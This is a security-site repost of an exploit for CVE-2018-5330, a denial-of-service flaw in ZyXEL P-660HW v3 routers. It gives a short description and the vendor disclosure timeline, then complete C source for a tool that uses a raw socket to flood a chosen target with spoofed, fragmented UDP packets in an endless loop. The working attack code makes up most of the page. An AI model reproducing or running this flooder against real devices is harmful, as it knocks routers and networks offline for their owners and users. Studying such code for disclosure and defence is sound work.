首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZyXEL P-660HW UDP Denial Of Service
来源:hosein.askari@aol.com 作者:Askari 发布时间:2018-01-15  
################
#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service
CVE: CVE-2018-5330
#CWE: CWE-400
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#description:  ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.
#####################
Vendor status:
[02.01.2018] Vulnerability discovered
[04.01.2018] CVE requestion
[10.01.2018] CVE assigned
[10.01.2018] Contact with the vendor
[11.01.2018] Vendor responds asking for details
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)
[11.01.2018] Vendor assigns appropriate team for coordination
[11.01.2018] Vendor is analyzing the issue
[12.01.2018] Asked vendor for confirmation 
[12.01.2018] Vendor replies with confirmation of the issue
#####################
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define change(n)  (n)
#else 
#define change(n)  htons(n)
#endif
#define ip_1   8193 
#define head     153    
#define u_head    41 
#define level 0
// Exploit Author : Hosein Askar
u_long p_rec(u_char *);
void running(u_char *);
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{
 	
    int j = 1, i, socks, counter=1, number=1;
    u_long  s_ip = 0;
    u_long d_ip = 0;
    u_short s_port = 0;
	u_short d_port = 0;
	if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
	 {
  	      perror("Error");
  	      exit(1);
	 }
    if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)
     {
          perror("Error");
          exit(1);
     }
 
    if (argc < 2) running(argv[0]);
    if (!(d_ip = p_rec(argv[1])))
    {
        exit(1);
    }

    fprintf(stderr, "Attack is started \n");

   for (;;) {
      counter ++;
      s_ip = counter*10;
      s_port = counter*10;
      d_port = counter+1*10;
      if (counter>10)
        counter = 1;
      for (i = 0; i < 10; i++)
      {
          fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);
      }
    }
    return (0);
}
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)
{
    u_char *p = NULL, *pointer = NULL;   
    u_char byte;                            
    struct sockaddr_in sin;                 

    sin.sin_family      = AF_INET;
    sin.sin_port        = s_port;
    sin.sin_addr.s_addr = d_ip;

    p = (u_char *)malloc(head + u_head + level);
    pointer  = p;
    
    byte = 69;                       
    memcpy(pointer, &byte, sizeof(u_char));
    pointer += 2;                         
    *((u_short *)pointer) = change(head + u_head + level);    
    pointer += 2;
    *((u_short *)pointer) = htons(number);   
    pointer += 2;
    *((u_short *)pointer) |= change(ip_1);  
    pointer += 2;
    *((u_short *)pointer) = 247;         
    byte = IPPROTO_UDP;
    memcpy(pointer + 1, &byte, sizeof(u_char));
    pointer += 4;                         
    *((u_long *)pointer) = s_ip;        
    pointer += 4;
    *((u_long *)pointer) = d_ip;        
    pointer += 4;
    *((u_short *)pointer) = htons(s_port);       
    pointer += 2;
    *((u_short *)pointer) = htons(d_port);       
    pointer += 2;
    *((u_short *)pointer) = htons(8);
    if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(p);
         exit(1);
     }
    free(p);
}
u_long p_rec(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}
void running(u_char *name)
{
    fprintf(stderr,
            "%s d_ip\n",
            name);
    exit(0);
}
##########################



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eBPF 4.9-stable Verifier Bug B
·PyroBatchFTP < 3.19 - Buffer O
·pfSense < 2.1.4 - 'status_rrd_
·Microsoft Edge Chakra - 'Appen
·SysGauge Server 3.6.18 - Buffe
·macOS - 'process_policy' Stack
·Disk Pulse Enterprise 10.1.18
·Microsoft Windows - NTFS Owner
·Adminer 4.3.1 - Server-Side Re
·Parity Browser < 1.6.10 - Bypa
·OBS studio 20.1.3 - Local Buff
·D-Link Routers 110/412/615/815
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved